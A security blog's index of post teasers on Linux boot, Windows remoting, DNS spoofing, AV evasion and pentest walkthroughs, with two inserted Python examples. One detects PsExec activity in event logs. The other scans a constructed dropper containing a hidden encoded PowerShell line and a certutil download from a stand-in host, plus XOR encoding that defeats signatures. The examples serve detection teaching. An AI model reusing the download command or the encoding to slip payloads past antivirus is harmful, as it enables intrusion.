Digging into the Linux Secure Boot Process

Introduction This article will begin with a high-level overview of the Ubuntu boot process and will continue to dig deeper into the role of Secure Boot in it when enabled. Some of the concepts I will be covering include shim, EFI variables, and MOKs (Machine Owner Keys). The information presented here was aggregated from the sources listed at the bottom of this article. Commands and example output will also be included to help present the topic in a more comprehensive way....

2023-04-29 · 9 min · Ally Petitt

How to Prevent Data Leaks Before they Happen

Data Loss Prevention What is Data Loss Prevention? Data Loss Prevention (DLP) is a strategy for preventing data exfiltration and destruction. Examples of data include financial information, customer data, trade secrets, and other confidential information that could harm a company or its customers if exposed. Common causes of data loss include: Human error: accidental deletion of sensitive files, misconfiguring security settings, or being the victim of a social engineering attack. Insider threats: unauthorized saving and distribution of sensitive files by those with access to corporate systems....

2023-04-23 · 3 min · Ally Petitt

Restoring Files in /usr/include

Hi guys, I made a mistake. In my frustration trying to debug my C program, I inadvertently deleted all the files within my /usr/include folder. I didn’t realize at the time that this was a very important folder! As explained here, it stores the system’s C header files, including the C library’s headers and the Linux kernel’s UAPI headers! Rookie mistake, but luckily for us, there are ways to fix it. If your /usr/include folder is also looking more empty than the shelves during COVID, I come bearing the solution....

2023-04-13 · 2 min · Ally Petitt

How to Create and Deploy Your Own Cloud Server with NextCloud

Why Create a Cloud Server? As many security-conscious people are aware, saving something in the cloud really means saving it on somebody else’s computer. When using cloud services, you don’t own the data that you upload, nor do you own the program that you’re using. Additionally, it is within the cloud service provider’s rights to delete your data or remove your access to it if they had technical issues, went bankrupt, or you missed a bill....

2023-04-09 · 5 min · Ally Petitt

Practical Demonstration: DNS Spoofing + Home Lab

DNS Cache Poisoning on Home Lab Walkthrough Overview In this article, I will be walking you through a common method of implementing DNS cache poisoning on a network. I’ll illustrate my process with screenshots, commands, and explanations. You are welcome to follow along and gain hands-on experience with DNS spoofing to further reinforce the knowledge that you already have. Intended Audience This is intended for a more technical audience. If you’re a beginner, I recommend looking for a more comprehensive tutorial to walk you through all the terminology and commands....

2023-03-28 · 5 min · Ally Petitt

How I got my OSCP at 16 years old

Wait, you can do that? The answer is a resounding “yes”. And I’m not the only one who got my OSCP at the age of 16. Meet Mihai, Vanshal, Grant, and this person from Reddit. Admittedly, the number of us is few and far between when compared to the typical demographic of OSCP test-takers. To add to this, I’m a woman and I haven’t seen any other women my age do this....

2023-03-19 · 20 min · Ally Petitt

Windows Remoting: Difference between psexec, wmiexec, atexec, *exec

If you’re anything like me, you discovered Impacket, either through a course, Ippsec, or your own research, and you look at the scripts. Your grin turns into horror as you realize the sheer number of scripts that end with “exec”. They all give you remote access, but when do you use which one!? Don’t worry, I have your back. Let’s break them down. PsExec PsExec works by writing a randomly-named binary to the ADMIN$ SMB share (which is why you require write access to that share in order to use it)....

2022-12-09 · 4 min · Ally Petitt
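The teaser above describes PsExec dropping a randomly named binary into ADMIN$. The following added example, written for this listing and not code from the original post or from Impacket, shows the defender's view of that behaviour: it correlates a write to the ADMIN$ share (Security event 5145) with a subsequent service installation (System event 7045) over a few constructed, simplified log lines. The pipe-delimited line format, the account and service names, the eight-letter random-name heuristic and the confidence labels are all assumptions made for the example.

```python
"""Added example: detecting PsExec-style lateral movement from simplified, constructed
Windows event lines. Log format, names and heuristics are assumptions for illustration."""
import re
from typing import Dict, List

# Constructed, simplified event lines (not a real log export). 5145 = network share
# object accessed (Security log), 7045 = new service installed (System log).
SAMPLE_EVENTS: List[str] = [
    r"EventID=5145 | SubjectUserName=svc_backup | ShareName=\\*\ADMIN$ | RelativeTargetName=xvqTkWpa.exe | AccessMask=0x2",
    r"EventID=7045 | ServiceName=xvqTkWpa | ImagePath=%SystemRoot%\xvqTkWpa.exe | StartType=demand start",
    r"EventID=7045 | ServiceName=PSEXESVC | ImagePath=%SystemRoot%\PSEXESVC.exe | StartType=demand start",
    r'EventID=7045 | ServiceName=Sense | ImagePath="C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe" | StartType=auto start',
    r"EventID=5145 | SubjectUserName=alice | ShareName=\\*\IPC$ | RelativeTargetName=svcctl | AccessMask=0x12019f",
    r"EventID=7045 | ServiceName=qwLpzRkt | ImagePath=%SystemRoot%\qwLpzRkt.exe | StartType=demand start",
]

WRITE_DATA = 0x2  # FILE_WRITE_DATA / FILE_ADD_FILE bit in the 5145 AccessMask


def parse_event(line: str) -> Dict[str, str]:
    """Split one 'Key=Value | Key=Value' line into a dict."""
    fields: Dict[str, str] = {}
    for part in line.split(" | "):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def basename(path: str) -> str:
    """Last path component, with surrounding quotes removed."""
    return re.split(r"[\\/]", path.strip('"'))[-1]


def looks_random_name(stem: str) -> bool:
    """Assumed heuristic: Impacket's psexec names its dropped service binary with
    eight random ASCII letters. Legitimate services rarely look like this."""
    return re.fullmatch(r"[A-Za-z]{8}", stem) is not None


def in_system_root(path: str) -> bool:
    """True if the binary sits directly in %SystemRoot% (where ADMIN$ maps), not in a subfolder."""
    return re.match(r"^(%systemroot%|[a-z]:\\windows)\\[^\\]+$", path.strip('"').lower()) is not None


def detect_psexec(lines: List[str]) -> List[Dict[str, object]]:
    events = [parse_event(line) for line in lines]

    # Pass 1: binaries written into ADMIN$ (mapped to %SystemRoot%), keyed by file name.
    admin_writes: Dict[str, str] = {}
    for ev in events:
        if ev.get("EventID") == "5145" and ev.get("ShareName", "").upper().endswith("ADMIN$"):
            if int(ev.get("AccessMask", "0"), 16) & WRITE_DATA:
                admin_writes[basename(ev["RelativeTargetName"]).lower()] = ev.get("SubjectUserName", "?")

    # Pass 2: service installs whose binary is the PsExec service or a random drop in ADMIN$.
    findings: List[Dict[str, object]] = []
    for ev in events:
        if ev.get("EventID") != "7045":
            continue
        image = ev.get("ImagePath", "")
        name = basename(image)
        stem = re.sub(r"\.exe$", "", name, flags=re.IGNORECASE)
        reasons: List[str] = []
        confidence = ""
        if name.lower() == "psexesvc.exe":
            reasons.append("service binary is PSEXESVC.exe, the Sysinternals PsExec service")
            confidence = "high"
        elif looks_random_name(stem) and in_system_root(image):
            reasons.append("eight-letter random-looking binary dropped directly in the system root")
            confidence = "medium"
        if name.lower() in admin_writes:
            reasons.append(f"same binary was written to ADMIN$ by {admin_writes[name.lower()]}")
            confidence = "high"
        if confidence:
            findings.append({"service": ev.get("ServiceName", "?"), "image": image,
                             "confidence": confidence, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in detect_psexec(SAMPLE_EVENTS):
        print(str(f["confidence"]).upper(), f["service"], "->", "; ".join(f["reasons"]))
```

Run stand-alone, the script reports xvqTkWpa as high confidence (random name plus a matching ADMIN$ write), PSEXESVC as high, qwLpzRkt as medium (random name but no observed share write), and leaves the Defender service alone. On real hosts the 5145 events only exist when "Detailed File Share" auditing is enabled, so the 7045 heuristic is what you can usually rely on.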

VPN Troubleshooting: How to fix “Inactivity Timeout ( — ping-restart)”

If your VPN log looks something like this: I’m here to help. During my time working through the PEN-200 labs, I’ve faced the constant struggle of losing connection to the host every few seconds or minutes. I tried to troubleshoot this “Inactivity Timeout” error with an Offsec employee for 3 hours to no avail. Finally, I figured out the solution and I am here to share it with those of you who have the same struggle....

2022-11-12 · 3 min · Ally Petitt

What the Pen-200 Has Taught Me About Pentesting Methodology

The Pen-200 is the prerequisite course for the OSCP exam. As such, the writeups for the labs are incredibly difficult to find. As someone who has relied heavily on the accessibility of HTB walkthroughs, I’ve never been in an environment where I wasn’t one Google search away from figuring out the next step in solving a box. Needless to say, 0xdf couldn’t help me much with the Pen-200 labs. The Pen-200 labs were a struggle not because I was incompetent, but because I didn’t have enough practice reaching dead ends....

2022-11-02 · 3 min · Ally Petitt

How Did an 18-Year-Old Hack Uber?

An 18-year-old hacker gained admin access to Uber on September 15, 2022. These are the steps that the hacker took: The hacker obtained an Uber employee’s phone number. He directed the employee to a phishing site that looked like an Uber login page. The employee logged in and the hacker gained his credentials. The hacker tried to get around the MFA by doing a Multi-Factor Authentication Fatigue attack. This attack consists of spamming MFA requests to the employee until he gets annoyed enough to allow the login attempt to go through....

2022-09-24 · 3 min · Ally Petitt

How Companies Respond to Cyber Attacks | The 6 Steps of an Incident Response Plan

Introduction This article contains information that I have gathered as I’ve done research on incident response. This aims to be actionable for red teamers to know what to look out for and for blue teamers to aid in the creation of an effective incident response plan. Key Roles: the CISO ensures cyberattacks are promptly investigated, coordinates incident response efforts during a cyberattack, and investigates which data may have been stolen....

2022-07-09 · 3 min · Ally Petitt

Pentester’s Guide to Performing File Transfers

Foreword To avoid detection, it is best to use tools that are native to the victim’s computer. FTP with Windows Host While having a shell on the Windows machine, start an FTP server on your host machine. Follow these steps if you don’t already have an FTP server installed: sudo apt-get install vsftpd; sudo service vsftpd start; service vsftpd status (the status should be active). To check if your server is working, type ftp localhost....

2022-06-08 · 3 min · Ally Petitt

Antivirus Evasion: What it is and How to do it

How Does Antivirus Software Actually Work? Antivirus software acts as a defense against trojans, viruses, ransomware, spyware, adware, and much more. There are 3 main ways that it detects malware: signature-based detection, heuristic-based detection, and anomaly-based detection. Signature-Based Detection The scanner extracts specific byte sequences (or a hash) from a program and looks them up in a database of known malware. These signatures are often taken from the payload of the malicious code. If a signature matches, the file is flagged as malicious....

2022-05-30 · 3 min · Ally Petitt
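As an added example that is not part of the original post, the script below implements the first two detection methods the teaser lists on a constructed sample: a signature scan (exact SHA-256 hash, then byte patterns) and a simple entropy heuristic, and then shows what each one sees after the sample is XOR-encoded with a keystream, the kind of transformation the evasion article is about. The signature names, the sample dropper text, the XOR keystream scheme and the 6.5-bit entropy cut-off are all assumptions made for the example; real engines use far larger databases and thresholds tuned per file type.

```python
"""Added example: signature- and heuristic-based scanning on a constructed sample.
Signatures, sample content and thresholds are assumptions for illustration only."""
import base64
import hashlib
import math
import re
from typing import Dict, List

# Pattern signatures: byte regexes run over raw file contents (constructed, not real AV signatures).
PATTERN_SIGNATURES: Dict[str, bytes] = {
    "Test.Sig.EncodedPowerShell": rb"powershell[^\r\n]*-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}",
    "Test.Sig.StagerDownload": rb"https?://[^\s\"']+/stager\.bin",
}

# A harmless, constructed "dropper" that the signatures above were written for.
_ENCODED = base64.b64encode(b"Write-Host 'constructed sample, not real malware'")
SAMPLE_PLAIN = (
    b"@echo off\r\n"
    + b"rem constructed sample dropper for the scanner demo, not real malware\r\n"
    + b"powershell -nop -w hidden -enc " + _ENCODED + b"\r\n"
    + b"certutil -urlcache -split -f http://example.invalid/stager.bin stager.bin\r\n"
    + b"rem filler text so the file has realistic low-entropy content around the payload\r\n" * 4
)

# Hash signatures: exact whole-file matches, the cheapest and most brittle kind.
HASH_SIGNATURES: Dict[str, str] = {
    hashlib.sha256(SAMPLE_PLAIN).hexdigest(): "Test.Hash.KnownSample",
}

ENTROPY_THRESHOLD = 6.5  # assumed cut-off in bits/byte; real engines tune this per file type


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: roughly 4-5 for text, approaching 8 for encrypted or packed data."""
    if not data:
        return 0.0
    counts = [0] * 256
    for byte in data:
        counts[byte] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def scan_signatures(data: bytes) -> List[str]:
    """Signature-based detection: exact hash lookup first, then each byte pattern."""
    hits: List[str] = []
    digest = hashlib.sha256(data).hexdigest()
    if digest in HASH_SIGNATURES:
        hits.append(HASH_SIGNATURES[digest])
    for name, pattern in PATTERN_SIGNATURES.items():
        if re.search(pattern, data, re.IGNORECASE):
            hits.append(name)
    return hits


def scan_heuristic(data: bytes) -> List[str]:
    """Heuristic detection: flag content that looks packed or encrypted, which is
    exactly what a pattern scanner cannot read."""
    findings: List[str] = []
    if shannon_entropy(data) > ENTROPY_THRESHOLD:
        findings.append("high-entropy content (possible packed or encrypted payload)")
    return findings


def xor_keystream(data: bytes, key: bytes) -> bytes:
    """The kind of encoding an evasion tool applies before dropping a payload: XOR
    against a SHA-256 counter keystream. Symmetric, so the same call decodes."""
    stream = bytearray()
    counter = 0
    while len(stream) < len(data):
        stream.extend(hashlib.sha256(key + counter.to_bytes(4, "big")).digest())
        counter += 1
    return bytes(b ^ k for b, k in zip(data, stream))


if __name__ == "__main__":
    encoded = xor_keystream(SAMPLE_PLAIN, b"demo-key")
    print("plain   :", scan_signatures(SAMPLE_PLAIN), scan_heuristic(SAMPLE_PLAIN))
    print("+2 bytes:", scan_signatures(SAMPLE_PLAIN + b"\r\n"))
    print("encoded :", scan_signatures(encoded), scan_heuristic(encoded))
```

The three runs in the main block make the teaser's point concrete: appending two bytes breaks the hash signature but not the pattern signatures, while XOR-encoding the whole file defeats every signature and only the entropy heuristic still fires. A real evasion chain pairs that encoding with a small decoder stub, which is why heuristic and behavioural checks look at the decoder and its runtime actions rather than the blob.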

Kerberos Authentication Explained

When first learning Kerberos, it can feel like you’re being chased by the three-headed dog. Not to fear, however, because today I’ll be giving a high-level overview of Kerberos authentication. Kerberos was designed to provide secure authentication to services over a potentially insecure network. It is used by many organizations to implement single sign-on (SSO). Kerberos Terminology In order to understand the step-by-step explanation, it is important to have a basic understanding of the various components of Kerberos....

2022-05-25 · 3 min · Ally Petitt

Mustacchio Walkthrough | Try Hack Me | Ally Petitt

Introduction Hey everyone! This is a write-up of how I was able to pwn the Mustacchio machine. I hope you enjoy! Notes: This was done on a Kali Linux machine so the commands might be slightly different if you are on Windows Enumeration To begin, I scanned for open ports using RustScan. RustScan, for those who have never heard of it, is a very fast port scanner that can hand the ports it finds to Nmap for service scanning. You can use Nmap alone if you prefer....

2022-02-18 · 6 min · Ally Petitt